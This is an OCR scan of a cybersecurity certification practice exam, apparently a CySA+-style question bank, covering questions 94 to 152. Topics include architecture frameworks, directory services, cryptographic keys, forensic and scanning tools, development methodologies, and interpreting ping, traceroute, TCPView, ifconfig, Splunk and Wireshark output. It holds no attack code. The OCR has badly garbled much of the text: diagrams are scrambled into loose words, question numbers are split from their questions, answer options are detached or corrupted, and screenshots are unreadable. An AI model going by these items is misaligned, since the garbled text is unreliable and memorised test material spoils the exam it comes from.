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94. In the TOGAF Architecture Development Model, shown here, what element should 
occupy the blank line in the center circle? 


Prelim: 
Framework 
and Principles 


A: 
Architecture 
Vision 








H: 
Architecture B: 
Change Business 
Management Architecture 
















C: 
Information 
System 
Architectures 


G: 
Implementation <§—_> 


Governance 









F: 





A D: 
Se ; Technology 
Architecture 


E 
Opportunities 
and Solutions 





A. Security 

B. Architecture 
C. Requirements 
D. Controls 


95. Rick is assessing the security of his organization’s directory services environment. As part 
of that assessment, he is conducting a threat identification exercise. Which one of the 
following attacks specifically targets directory servers? 


A. Man-in-the-middle 
B. LDAP injection 


96. 


97. 


98. 


99. 


100. 


Chapter 4 = Domain 4: Security Architecture and Tool Sets 219 


C. SASL skimming 
D. XSS 


Which one of the following vulnerability scanning tools is limited to collecting informa- 
tion from systems running a specific operating system? 


A. Nikto 

B. OpenVAS 
C. MBSA 

D. Qualys 


Samantha is investigating a cybersecurity incident where an internal user used his com- 
puter to participate in a denial-of-service attack against a third party. What type of policy 
was most likely violated? 


A. AUP 
B. SLA 
C. BCP 


D. Information classification policy 


Brenda would like to select a tool that will assist with the automated testing of applica- 
tions that she develops. She is specifically looking for a tool that will automatically gener- 
ate large volumes of inputs to feed to the software. Which one of the following tools would 
best meet her needs? 


A. Peach 
B. Burp 
C. ZAP 


D. ModSecurity 


Paul is selecting an interception proxy to include in his organization’s cybersecurity tool- 
kit. Which one of the following tools would not meet this requirement? 


A. ZAP 


B. Vega 
C. Burp 
D. Snort 


What are the four implementation tiers of the NIST Cybersecurity Framework, ordered 
from least mature to most mature? 


A. Partial, Risk Informed, Repeatable, Adaptive 
B. Partial, Repeatable, Risk Informed, Adaptive 
C. Partial, Risk Informed, Managed, Adaptive 
D. Partial, Managed, Risk Informed, Adaptive 
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101. Warren is working with a law enforcement agency on a digital forensic investigation and 
needs to perform a forensic analysis of a phone obtained from a suspect. Which one of the 


following tools is specifically designed for mobile forensics? 
A. 
B. 
C. 
D. 


FTK 
EnCase 
Cellebrite 
Helix 


102. Carol is the cybersecurity representative to a software development project. During the 
project kickoff meeting, the project manager used the figure shown here to illustrate their 
approach to development and invited Carol to contribute security requirements at each 
prototyping phase. Which software development methodology is this team using? 


A. 
B. 
C 


D. 


Prototype | 


Business 
Modeling 


Data Modeling 


Process 
Modeling 


Application 
Generation 


Testing and 
Turnover 


RAD 
Waterfall 
Agile 
Spiral 


Prototype ll 


Business 
Modeling 


Data Modeling 


Process 
Modeling 


Application 
Generation 


Testing and 
Turnover 





Prototype X 


Business 
Modeling 


Data Modeling 


Process 
Modeling 


Application 
Generation 


Testing and 
Turnover 


103. Which one of the following requirements is often imposed by organizations as a way to 
achieve their original control objective when they approve an exception to a security policy? 


A. 


B. 
C. 
D 


Documentation of scope 


Limited duration 


Compensating control 


Business justification 
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104. Crystal is a security analyst for a company that hosts several web applications. She would 
like to identify a tool that runs within her browser and allows her to interactively modify 
session values during a live session. Which one of the following tools best meets Crystal’s 
requirements? 


A. ‘Tamper Data 
B. Acunetix 

C. Zap 

D. Burp 


105. Berta is reviewing the security procedures surrounding the use of a cloud-based online 
payment service by her company. She set the access permissions for this service so that the 
same person cannot add funds to the account and transfer funds out of the account. What 
security principle is most closely related to Berta’s action? 


A. Least privilege 
B. Security through obscurity 
C. Separation of duties 
D. Dual control 
106. Kaela’s organization recently suffered a ransomware attack that was initiated through a 
phishing message. She does have a content filtering system in place designed to prevent 


users from accessing malicious websites. Which one of the following additional controls 
would be most effective at preventing these attacks from succeeding? 


A. Training 
B. Intrusion detection system with threat intelligence 
C. Application blacklisting 
D. Social engineering 
107. Terrence remotely connected to a Linux system and is attempting to determine the active 


network connections on that system. What command can he use to most easily discover 
this information? 


A. ifconfig 
B. tcpdump 

C. iptables 
D. ipconfig 


108. Kieran is evaluating forensic tools and would like to consider the use of an open source 
forensic suite. Which one of the following toolkits would best meet his needs? 


A. FTK 

B. EnCase 
C. SIFT 

D. Helix 
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109. Consider the LDAP directory hierarchy shown here. Two of the component names have 
been blacked out. What is the appropriate abbreviation for the node types that have been 
blacked out? 


dc = example, dc = com 


A. ad 
B. cn 
C. dc 
D. ou 


Questions 110-114 refer to the following scenario: 


Alice and Bob are both employees at the same company. They currently participate in an 
asymmetric cryptosystem and would like to use that system to communicate with each 
other securely. 


110. Alice would like to send an encrypted message to Bob. What key should she use to encrypt 
the message? 
A. Alice’s public key 
B. Alice’s private key 
C. Bob’s public key 


D. Bob’s private key 


111. When Bob receives the message from Alice, what key should he use to decrypt it? 
A. Alice’s public key 
B. Alice’s private key 
C. Bob’s public key 
D. Bob’s private key 


112. Before sending the message, Alice would like to apply a digital signature to it. What key 
should she use to create the digital signature? 


A. Alice’s public key 
B. Alice’s private key 
C. Bob’s public key 
D. Bob’s private key 


113. When Bob receives the message, what key can he use to verify the digital signature? 
A. 
B. 
C. 
D. 


114. 


115. 


116. 


117. 
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Alice’s public key 
Alice’s private key 
Bob’s public key 
Bob’s private key 
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If Alice applies a digital signature to the message, what cryptographic goal is she attempt- 
ing to achieve? 


A. 
B. 
C. 
D. 


Confidentiality 
Accountability 
Availability 


Nonrepudiation 


Sam recently installed a new security appliance on his network as part of a managed ser- 
vice deployment. The vendor controls the appliance, and Sam is not able to log into it or 


configure it. Sam is concerned about whether the appliance receives necessary security 
updates for the underlying operating system. Which one of the following would serve as 


the best control that Sam can implement to alleviate his concern? 


A. 
B. 
C. 
D. 


Configuration management 


Vulnerability scanning 


Intrusion prevention 


Automatic updates 


Val receives reports that users cannot access the CompTIA website from her network. She 
runs the ping command against the site and sees the results shown here. What conclusion 
can Val reach? 
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The following diagram shows the high-level design of a federated identity management 


laptop:~: ping www.comptia.org 
comptia.org (198 


PING www. 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 
64 bytes 


from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 


198. 


134. 


D. E s O iT o GN 
VU UVVU VUVUVUVNVNVNVV 
e O E € fw 8S @ 5 6 © 8 
DAAAAAAAAA 


6: 


1 


34.5.6): 56 data bytes 


icmp_seq=0 


6: icmp_seq=1 


icmp_seq=2 
icmp_seq=3 
icmp_seq=4 
icmp_seq=5 
icmp_seq=6 
icmp_seq=7 
icmp_seq=8 
icmp_seq=9 


icmp_seq=10 ttl=50 time=16.842 ms 


ttl=50 
ttl=50 
ttl=50 
ttl=50 
ttl=50 
ttl=50 
ttl=50 
ttl=50 
ttl=50 
ttl=50 


time=17. 
time=17. 
time=16. 
time=16. 
time=17. 
time=17. 
time=17. 
time=17. 
time=17. 
time=17. 


161 
550 
852 
999 
571 
980 
510 
532 
602 
541 


The network is working properly, but the website is down. 


The network path between her system and the website is functioning properly. 
There is excessive network latency that may be causing the issue. 


There is excessive packet loss that may be causing the issue. 


ms 
ms 
ms 
ms 
ms 
ms 
ms 
ms 
ms 
ms 


system. The name of the entity that participates in steps 1 and 4 has been blacked out. 
What is the proper name for this entity? 
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2. Consumer is redirected 
to the IDP, and their 
identity is validated 





l 
l 
Identity Provider (IDP) i 
l 
l 


[l 3. IDP provides token to consumer 
l 
@ trusts 





ı IDP 


Consumer , 
4@ accepts tokens and allows use of the service 


1. Consumer requests 
access > 


ee ae | 


Federation manager 
Service provider 


Ticket granting server 
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Domain controller 


118. Thomas found himself in the middle of a dispute between two different units in his busi- 
ness that are arguing over whether one unit may analyze data collected by the other. What 
type of policy would most likely contain guidance on this issue? 


A. Data ownership policy 
B. Data classification policy 
C. Data retention policy 
D. Account management policy 
119. Rose is considering deploying the Microsoft Enhanced Mitigation Experience Toolkit 
(EMET) to secure systems in her organization. She would specifically like to use the tool 


to prevent buffer overflow attacks that rely upon knowledge of specific memory locations 
used by applications. Which EMET feature would best meet Rose’s needs? 


A. DLP 

B. ASLR 
C. EMEA 
D. DEP 


120. Greg recently logged into a web application used by his organization. After entering his 
password, he was required to input a code from the app shown here. What type of authen- 
tication factor is this app providing? 
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No Service = 


© Authenticator P 


Google 


924233 


csaplus16@gmail.com 





A. Something you know 
B. Something you have 
C. Something you are 
D. Somewhere you are 


121. Which software development methodology is shown here? 


Sprint Planning Sprint Planning 


ON ff N 


Demonstration Development Demonstration 
Testing Testing 
Sprint 1 Sprint 2 
A. Waterfall 
B. Spiral 
C. Agile 
D. RAD 


A 


Development @ @ @ Demonstration 


x 


Sprint Planning 


Testing 


Sprint X 
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N 


Development 


/ 


122. Ian is reviewing the security architecture shown here. This architecture is designed to 
connect his local data center with an IaaS service provider that his company is using 
to provide overflow services. What component can be used at the points marked by ?s to 


provide a secure encrypted network connection? 


226 


123. 


124. 


125. 
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laaS 
Local Data Center Service Provider 


=e internal Virtual Servers 


Physical and 
Virtual Servers 


Internal laaS 
Network \ be E oa Provider 
Network 


Internal ; 
Database ae 


Databases 
Servers 


A. Firewall 
B. VPN 

C. IPS 

D. DLP 


Which one of the following tools is not typically used to gather evidence in a forensic 
investigation? 


A. FTK 

B. EnCase 
C. Helix 
D. Burp 


Renee is investigating a cybersecurity breach that took place on one of her organization’s 
Linux servers. As she analyzed the server log files, she determined that the attacker gained 
access to an account belonging to an administrative assistant. After interviewing the assistant, 
Renee determined that the account was compromised through a social engineering attack. The 
log files also show that the user entered a few unusual-looking commands and then began issu- 
ing administrative commands to the server. What type of attack most likely took place? 


A. Man-in-the-middle 

B. Buffer overflow 

C. Privilege escalation 

D. LDAP injection 

Joan is working as a security consultant to a company that runs a critical web applica- 
tion. She discovered that the application has a serious SQL injection vulnerability, but the 


company cannot take the system offline during the two weeks required to revise the code. 
Which one of the following technologies would serve as the best compensating control? 
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IPS 
WAF 


Vulnerability scanning 


Ipwp 


Encryption 


126. Which one of the following testing techniques is typically the final testing done before 
code is released to production? 


A. Unit testing 
B. Integration testing 
C. User acceptance testing 


D. Security testing 


127. Carla is designing a new data mining system that will analyze access control logs for signs 
of unusual login attempts. Any suspicious logins will be automatically locked out of the 
system. What type of control is Carla designing? 


A. Physical control 
B. Logical control 
C. Administrative control 


D. Compensating control 


128. Sam recently conducted a test of a web application using the tool shown here. What type 
of testing did Sam perform? 


seo Untitied Session - 20160109-122051 - OWASP ZAP 2.4.3 
Standard Mode H sf E mlg 537 å., @vreexak es 4 


aa + F Quick Sun Request ST + 
Header Text B Body Text B 


+ ^ Coreeus MTTP/3.1 200 OK 
T Octaut Cortext Server: nginx/1.9.4 
+ @ Ps Date: Sat, @9 Jan 2016 17:27:56 GIT 
Ba Content-Type: text/hteal; charset=UTF-8 
va pp a al Connection: keep-alive 
X-Powered-By: HVM/ 3.6.5 
P A CGET:saemap. uai Vary: Accept-Encoding, Cookie 
v ED A mps //enwtipeda org X-UA-Compatible: Ife€dge 
A @ CET robos ot 


<div 55° "aw-dody-content”> 
A @ CET stemup mi 


<div o“me-content-—text"><div isss" api-pretty-ħeader”><p>This is the HTML 
> D A aapi representation of the JSON format. HTML is good for debugging, but is unsuitədùle for application use. 
© CLT aps </p><peSpecify the <var>format</var> paraseter to change the output format. To see the non-HTML 
e @C{T wap representation of the JSON format, set <kbd>format+json</kbd>. 
Or ew </p><p>See the <a hrefe"//wew. mediawiki.org/wiki/API” psse"ext in” tit lee"mw:API">complete documentat ion</a 
e @ CET kad pro >, or the <a efe"/w/api.php?act lomehe lphenp; sodulesemain”QAPI help</a> for sore information. 
</p></div><div dire” ltr"><div »S6e"ew-high|light™><pre><span 9560" p">{</span> 
P @CiT <span 468"62" >4.quot ; serveddyiquot ; </span><span S680" >:</span> <span 1538" 52" >4.qu0t ;awl287iquot; 
</span><span ssa" p">,</Sp0n> 
> ar aw <span 1550"S2">Lquot :errorkquot ; </span><span She" O">:</span> <span os6e"p">{</span> 
<span 348° S2”">Squot ; codeiquot ; </span><span S580" >: </span> <span $3=°S2">Squot; 
unknown act iomiquot ;</span><span 342"p">, </span> 
<span 540° S2">4quot ; infoliquot ; </span><span ySse"O">: </span> <span 550" S2">4.quot ; Unrecognized 
value for oarameter LEW act ionic tO: AETA Toon! -</<oane<enan sa" oo > </snan> 


= history “A Search F% Alerts Output =O Soce I + 


@ New Fuzz Progress: O: HTTP - https://enwik.tion=modieview E n E 100% — P Current fuzzers:0 


Messages Sent 11 Eros: 0 A 


w Reflected 


wy Reflected 





Static analysis 


A 

B. Fuzzing 
C. Vulnerability scanning 
D 


Peer review 
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129. Which one of the following technologies is not typically used to implement network 
segmentation? 


A. Host firewall 
B. Network firewall 
C. VLAN tagging 


D. Routers and switches 


Questions 130-133 refer to the following scenario: 


Maddox ran a traceroute command to determine the network path between his system 
and the Amazon.com web server. He received the partial results shown here: 


traceroute to d3ag4hukkh62yn.cloudfront.net (52.84.61.25), 64 hops max, 52 byte packets 
192.168.1.1 (192.168.1.1) 1.277 ms 0.826 ms 0.831 ms 
10.179.160.1 (10.179.160.1) 15.040 ms 11.744 ms 11.822 ms 
172.30.35.33 (172.30.35.33) 21.534 ms 18.069 ms 17.193 ms 
68-66-73-118.client.mchsi.com (68.66.73.118) 18.075 ms 19.740 ms 19.949 ms 
68-66-73-122.client.mchsi.com (68.66.73.122) 30.204 ms 19.967 ms 25.860 ms 
52.95.217.136 (52.95.217.136) 19.344 ms 19.719 ms 29.578 ms 
52.95.62.84 (52.95.62.84) 20.400 ms 
52.95.62.36 (52.95.62.36) 26.577 ms 18.650 ms 
8 52.95.62.111 (52.95.62.111) 22.613 ms 

52.95.62.63 (52.95.62.63) 20.346 ms 

52.95.62.125 (52.95.62.125) 19.759 ms 
9 54.239.42.59 (54.239.42.59) 20.141 ms 

54.239.43.211 (54.239.43.211) 32.133 ms 

54.239.42.59 (54.239.42.59) 19.903 ms 
10 52.95.63.193 (52.95.63.193) 22.677 ms 

52.95.63.195 (52.95.63.195) 18.146 ms 19.960 ms 


NOUR WNE 


KEK KKH HK 
KEK KHKHK EK 


KEK KHK KH 


130. What is the IP address of the server hosting the Amazon.com website? 
A. 192.168.1.1 
B. 52.84.61.25 
C. 352.95.63.195 
D. 68.66.73.118 


131. What is the IP address of Maddox’s default gateway? 
A. 192.168.1.1 
B. 10.179.1.1 
C. 17230.3533 
D. 10.179.160.1 


132. What is the first IP address on the public Internet that this traffic is passing through? 
A. 192.168.1.1 
B. 172.30.35.33 
C. -32:95:63:1953 
D. 68.66.73.118 
133. How can Maddox interpret the asterisk results that appear beginning with line 11 of the 
traceroute results? 
A. They are normal results of performing a traceroute. 


B. The network is down. 
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C. Someone is intercepting his network traffic. 


D. The web server is down. 


134. Which one of the following elements is least likely to be found in a data retention policy? 
A. Minimum retention period for data 
B. Maximum retention period for data 
C. Description of information to retain 


D. Classification of information elements 


135. Bob remotely connected to a Windows server and would like to determine the server’s 
function. He ran the TCP View tool from the Sysinternals suite on that server and saw the 
results shown here. What role best describes this server? 


ah TCPView - Sysinternals: www.sysinternals.com 


File Options Process View Help 


Process 7 Protocol Local Address Local Port Remote Address Remote Port State 


lsass.exe 
lsass.exe 
[E] msmdsrv.exe 
[E] msmdsrv.exe 
services. exe 
services. exe 
spoolsv.exe 
spoolsv.exe 
E sqlservr.exe 
E sqlservr.exe 
E sqlservr.exe 
E sqlservr.exe 
E svchost.exe 
E svchost.exe 
= svchost.exe 
E] svchost.exe 
E svchost.exe 
[E svchost.exe 
E svchost.exe 
[E] svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
= svchost.exe 
E svchost.exe 
= svchost.exe 
E svchost.exe 
E svchost.exe 
E svchost.exe 
svchost.exe 
System 
E” System 
WF" System 
System 
System 


Se ee ee ee 


Established: 3 


TEP 
TCPV6 
TCP 
TCPVE 
TCP 
TCPV6 
TCP 
TCPV6 
TCP 
TGP 
TCPV6 
TCPV6 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
TCPV6 
TCPV6 
TCPV6 
TCPV6 
UDPV6 
UDPV6 
UDPV6 
UDPV6 
UDPV6 
UDPV6 
UDPV6 
UDPV6 
TEP 
TEP 
TCP 
TCP 
TCP 
UDP 
UDP 
TCPV6 
TCPV6 
TCPV6 
TCPV6 
TCP 
TCPV6 


Listening: 31 


0.0.0.0 
[0:0:0:0:0:0:0:0) 
0.0.0.0 
[0:0:0:0:0:0:0:0) 
0.0.0.0 
(0:0:0:0:0:0:0:0) 
0.0.0.0 


(0:0:0:0:0:0:0:0) 
0.0.0.0 
127.0.0.1 
[0:0:0:0:0:0:0:0) 
(0:0:0:0:0:0:0:1] 
0.0.0.0 

0.0.0.0 
172.31.57.167 
0.0.0.0 

0.0.0.0 

0.0.0.0 
127.0.0.1 
172.31.57.167 
0.0.0.0 

0.0.0.0 

0.0.0.0 

0.0.0.0 
172.31.57.167 
127.0.0.1 
[0:0:0:0:0:0:0:0) 
(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:1] 


[fe80:0:0:0:8837:b... 


[0:0:0:0:0:0:0:0) 
(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 


[fe80:0:0:0:8837:b... 


(0:0:0:0:0:0:0:1] 
172.31.57.167 
0.0.0.0 

0.0.0.0 

0.0.0.0 

0.0.0.0 
172.31.57.167 
172.31.57.167 
(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
0.0.0.0 
[0:0:0:0:0:0:0:0) 


Time Wait: 4 


49685 
49685 
2383 
2383 
49678 
49678 
49668 
49668 
1433 
1434 
1433 
1434 
135 
3389 
3389 
49665 
49666 
123 
1900 
1900 
3389 
5050 
5353 
5355 
57291 
57292 
135 
3389 
49665 
49666 
123 
1900 
1900 
3389 
5353 
5355 
57289 
57290 
139 
80 
445 
5985 
47001 
137 
138 
80 
445 
5985 
47001 
49664 
49664 


Close Wait: 0 


0.0.0.0 
[0:0:0:0:0:0:0:0) 
0.0.0.0 
[0:0:0:0:0:0:0:0) 
0.0.0.0 


(0: 0: 0:0: 0:0:0:0) 
0.0.0.0 


(0:0:0:0:0:0:0:0) 
0.0.0.0 

0.0.0.0 
[0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
0.0.0.0 

0.0.0.0 
50.207.18.2 
0.0.0.0 

0.0.0.0 


x 
x 
x 
x 
x 
x 
x 


[0:0:0:0:0:0:0:0) 
(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 


x 
x 
x 
x 
x 
x 


0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 


(0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
[0:0:0:0:0:0:0:0) 
0.0.0.0 

(0:0:0:0:0:0:0:0) 


ooo0o0o0o* ,qoooo0o0 * 2: ss ses OOOO * zs xs x es FFF zxFQgvnomooqooooo ooo ooooo 


LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
ESTABLISHED 
LISTENING 
LISTENING 


LISTENING 
LISTENING 
LISTENING 
LISTENING 


LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
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Web server 
File server 
Database server 


Logging server 


136. Which forensic imaging tool is already installed on most Linux operating systems? 
FTK 
OSFClone 
EnCase 


dd 


GSO FPrPe UOWD 


137. Bobbi is deploying a single system that will be used to manage a sensitive industrial control 
process. This system will operate in a stand-alone fashion and not have any connection to 
other networks. What strategy is Bobbi deploying to protect this SCADA system? 


A. Network segmentation 
B. VLAN isolation 
C. Air gapping 


D. Logical isolation 


138. Which software development methodology is illustrated here? 


Gather Requirements 


Implement 
Test / Validate 







A. Spiral 
B. RAD 
C. Agile 
D. Waterfall 
139. Charles is assessing the security of his organization’s RADIUS server. Which one of the 


following security controls could Charles use to best mitigate the security vulnerabilities 
inherent in the RADIUS authentication protocol? 


140. 


141. 


142. 
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Hashing of stored passwords 
Encryption of stored passwords 
Encryption of network traffic 
Replacement of TCP with UDP 


90D > 


Which of the following parties directly communicates with the end user during a SAML 
transaction? 


A. Relying party 

B. SAML identity provider 

C. Both the relying party and the SAML identity provider 

D. Neither the relying party nor the SAML identity provider 

In a federated identity management system, what entity is responsible for creating an 
authentication token? 

A. Identity provider 

B. Service provider 

C. Federation coordinator 

D. Endpoint device 


Ty is troubleshooting a security issue with a website maintained by his organization. Users 
are seeing the error message shown here. What can Ty do to remediate this issue? 


Details 


Could not verify this certificate because the issuer is unknown. 





Issued To 

Common Name (CN)  *.badssl.com| 

Organization (O) BadSSL 

Organizational Unit (OU) <Not Part Of Certificate> 
Serial Number 00:86:FB:4D:C8:E5:DD:0F:18 


Issued By 

Common Name (CN) * badssl.com 
Organization (O) BadSSL 

Organizational Unit (OU) <Not Part Of Certificate> 


Period of Validity 

Begins On August 8, 2016 

Expires On August 8, 2018 

Fingerprints 

SHA-256 Fingerprint 28:C9:E8:BA:A6:03:EE:94:00:2E:CA:CD:37:C1:50:91: 
DC:A6:E1:AC:8E:D4:29:E3:11:89:7C:6C:72:20:34:B0 


SHA‘1 Fingerprint 64:14:50:D9:4A:65:FA:EB:3B:63:10:28:D8:E8:6C:95:43:1D:B8:11 
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143. 


144. 


145. 
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Use a different CA 
Renew the certificate 


Upgrade the cipher strength 


Ipwp 


Patch the operating system 


Richard would like to deploy a web application firewall in front of a vulnerable web appli- 
cation. Which one of the following products is least likely to meet his needs? 


A. CloudFlare 


B. FortiWeb 
C. NAXSI 
D. FTK 


In the ITIL service life cycle shown here, what core activity is represented by the X? 


X 





Continual service improvement 
Service design 


Service operation 
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Service transition 

Ted is preparing an RFP for a vendor to supply network firewalls to his organization. 
Which one of the following vendors is least likely to meet his requirements? 

A. CheckPoint 

B. Palo Alto 
C. FireEye 
D 


Juniper 


146. 


147. 
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Which one of the following approaches is an example of a formal code review process? 
A. Pair programming 

B. Over-the-shoulder 

C. Fagan inspection 

D. Pass-around code review 

Randy’s organization recently adopted a new testing methodology that they find is very 
compatible with their agile approach to software development. In this model, one devel- 


oper writes code, while a second developer reviews their code as they write it. What 
approach are they using? 


A. Pair programming 
B. Over-the-shoulder review 
C. Pass-around code reviews 


D. ‘Tool-assisted reviews 


148. Julie is refreshing her organization’s cybersecurity program using the NIST Cybersecurity 


149. 


Framework. She would like to use a template that describes how a specific organization 
might approach cybersecurity matters. What element of the NIST Cybersecurity Frame- 
work would best meet Julie’s needs? 


A. Framework Scenarios 
B. Framework Core 
C. Framework Implementation Tiers 


D. Framework Profiles 


Mike is troubleshooting an issue on his Mac and believes that he may have a defective net- 
work interface. He uses the ifconfig command to determine details about the interface 
and receives the results shown here. Which network interface appears to have an active 
connection to a network? 


Mikes—Mac-mini:~ mchapple$ ifconfig 
1lo@: flags=8049<UP,_LOOPBACK,RUNNING,MULTICAST> mtu 16384 
opt ions=1203<RXCSUM, TXCSUM, TXSTATUS, SW_TIMESTAMP> 
inet 127.0.0.1 netmask Oxff000000 
inet6 ::1 prefixlen 128 
inet6 fe80::1%lo®@ prefixlen 64 scopeid 0x1 
nd6 options=201<PERFORMNUD , DAD> 
gif@: flags=8010<POINTOPOINT,MULTICAST> mtu 1280 
stf®@: flags=0<> mtu 1280 
en®@: flags=8863<UP, BROADCAST, SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 
options=10b<RXCSUM, TXCSUM, VLAN_HWTAGGING, AV> 
ether 98:5a:eb:cf:5d:21 
nd6 options=201<PERFORMNUD , DAD> 
media: autoselect (none) 
status: inactive 
en1: flags=8863<UP, BROADCAST, SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 
ether 78:9f:70:7a:63:56 
inet6 fe80::c04:d54a:4a38: fab7%en1 prefixlen 64 secured scopeid 0x5 
inet 10.0.1.77 netmask Oxffffff00 broadcast 10.0.1.255 
inet6 2601:245:c101:54f6:1cf9:4aae:38a4:897 prefixlen 64 autoconf secured 
inet6 2601:245:c101:54f6:b0b3:d875:df5d:69b2 prefixlen 64 deprecated autoconf temporary 
inet6 2601:245:c101:54f6:9d2e:4a3b:3c03:8fb3 prefixlen 64 deprecated autoconf temporary 
inet6 2601:245:c101:54f6:91c4:2844:1c7:97d® prefixlen 64 deprecated autoconf temporary 
inet6 2601:245:c101:54f6:46a:838f:27b2:b2e1 prefixlen 64 deprecated autoconf temporary 
inet6 2601:245:c101:54f6: f877:aa73:2726:daad prefixlen 64 autoconf temporary 
nd6 options=201<PERFORMNUD , DAD> 
media: autoselect 
status: active 
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loO 
eif0 


en0 
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enl 


150. Simon would like to use a cybersecurity analysis tool that facilitates searching through 
massive quantities of log information in a visual manner. He has a colleague who uses the 
tool shown here. What tool would best meet Simon’s needs? 


Q New Search SaveAsv Close 


host=dynamo All time v Q 


v 101,817 events (before 1/7/17 2:35:30.000 PM) No Event Sampling v Jobv Ut E A & 4 @ Smart Mode v 





Events (101,817) Patterns Statistics Visualization 


Format Timeline v —ZoomOut +Zoomto Selection x Deselect 1 day per column 





151. 


< Hide Fields = All Fields 


Selected Fields 
a host 1 

a source 3 

a sourcetype 3 


Interesting Fields 

a Account_Domain 4 
a Account_Name 10 
a ComputerName 1 
# date_hour 24 

# date_mday 31 

# date_minute 60 

a date_month 4 

# date_second 60 

a date_wday 7 

# date_year 2 

a date_zone 1 

# Event_Source_ID 100+ 
# EventCode 100+ 

# EventType 5 

a index 1 

a Keywords 12 

# linecount 27 

a LogName 3 

# Logon_ID 33 

a Message 100+ 

a OpCode 11 

# Process_ID 100+ 
a Process_Name 16 
a punct 100+ 

# RecordNumber 100+ 
a Security_ID 11 

a Source_Name 1 

a SourceName 100+ 
a splunk_server 1 


[ofm 


List v /Format v 20 Per Page v 


i Time 


> | 17/17 
2:28:31.000 PM 


| > | 47 


2:28:31.000 PM 


| > | wane 


2:28:20.000 PM 


2:27:50.000 PM 


| > | 4Wn7 


2:27:50.000 PM 


| > |nr 
2:27:48.000 PM 


A. Syslog 

B. Kiwi 

C. Splunk 

D. Sysinternals 


Event 


01/07/2017 02:28:31 PM 

LogName=Application 

SourceName=MsiInstaller 

EventCode=1033 

EventType=4 

Show all 15 lines 

host = dynamo : source = WinEventLog:Application : sourcetype = WinEventLog:Application 
01/07/2017 02:28:31 PM 

LogName=Application 

SourceName=MsiInstaller 

EventCode=11707 

EventType=4 

Show all 15 lines 

host = dynamo : source = WinEventLog:Application : sourcetype = WinEventLog:Application 
01/07/2017 02:28:20 PM 

LogName=Application 

SourceName=MsiInstaller 

EventCode=1042 

EventType=4 

Show all 15 lines 


host = dynamo : source = WinEventLog:Application : sourcetype = WinEventLog:Application 





01/07/2017 02:27:50 PM 

LogName=System 

SourceName=Microsoft-Windows-Service Control Manager 
EventCode=7040 

EventType=4 

Show all 15 lines 

host = dynamo | source = WinEventLog:System : sourcetype = WinEventLog:System 
01/07/2017 02:27:50 PM 

LogName=System 

SourceName=Microsoft-Windows-Service Control Manager 
EventCode=7045 

EventType=4 

Show all 21 lines 


host = dynamo : source = WinEventLog:System : sourcetype = WinEventLog:System 


01/07/2017 02:27:48 PM 

LogName=System 

SourceName=Microsoft-Windows-Service Control Manager 
EventCode=7045 

EventType=4 

Show all 21 lines 


following issues is Acunetix most likely to detect? 


A. Cross-site scripting 


Lexical scoping errors 


B 
C. Buffer overflows 
D 


Insecure data storage 





Wanda’s organization uses the Acunetix tool for software testing. Which one of the 


152. Mike is analyzing network traffic using Wireshark and comes across the packet shown 
here. Which one of the following phrases best describes the purpose of this packet? 
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le 


k | 


ih 


Ø Wi-Fi: end 


\2aa8 





«968053 
«968174 
«968198 
«968309 
«968332 
«128853 


Source 
216.58.192.202 
10.36.19.226 
216.58.192.202 
10.36.19.226 
216.58.192.202 
10.36.19.226 
10.36.19.226 


Destination 
10.36.19.226 
216.58.192.202 
10.36.19.226 
216.58.192.202 
10.36.19.226 
216.58.192.202 
209.85.147.125 


Protocol Length 
TLSv1 535 
TCP 66 
TLSv1 999 
TCP 66 
TLSv1 103 
TCP 66 
XMPP/... 540 


Info 
Application Data 


53517 + 443 [ACK] Seq=6938 Ack=6490 Win=130592 Len=0 TSval=414172842 TSecr=2508329797 


Application Data 


53517 + 443 [ACK] Seq=6938 Ack=7423 Win=130112 Len=0 TSval=414172842 TSecr=2508329797 


Application Data 


53517 + 443 [ACK] Seq=6938 Ack=746@ Win=13008@ Len=0 TSval=414172842 TSecr=2508329797 


UNKNOWN PACKET 
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255 


«148361 


10.36.19.226 


66.205.160.99 


DNS 79 


Standard query ®x9c48 A clients4.google.com 





Frame 4767: 79 bytes on wire (632 bits), 79 bytes captured (63 


Domain Name System (query) 
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255 
255 
255 
255 
255 
255 
255 
255 


«149370 
«149725 
. 150183 
. 150252 
«162769 
. 175809 
. 176028 
«176708 


209.85.147.125 
66.205. 160.99 
10.36.19.226 
10.36.19.226 
172.217.1.46 
172.217.1.46 
172.217.1.46 
10.36.19.226 


{Response In: 4769] 
Transaction ID: ®x9c48 
Flags: 0x0100 Standard query 
Questions: 1 
Answer RRs: 0 


Authority RRs: @ 
Additional RRs: @ 


Queries 


10.36.19.226 
10.36.19.226 
172.217.1.46 
172.217.1.46 
10.36.19.226 
10.36.19.226 
10.36.19.226 
172.217.1.46 


v clients4.google.com: type A, class IN 
Name: clients4.google.com 
[Name Length: 19] 

[Label Count: 3] 
Type: A (Host Address) (1) 
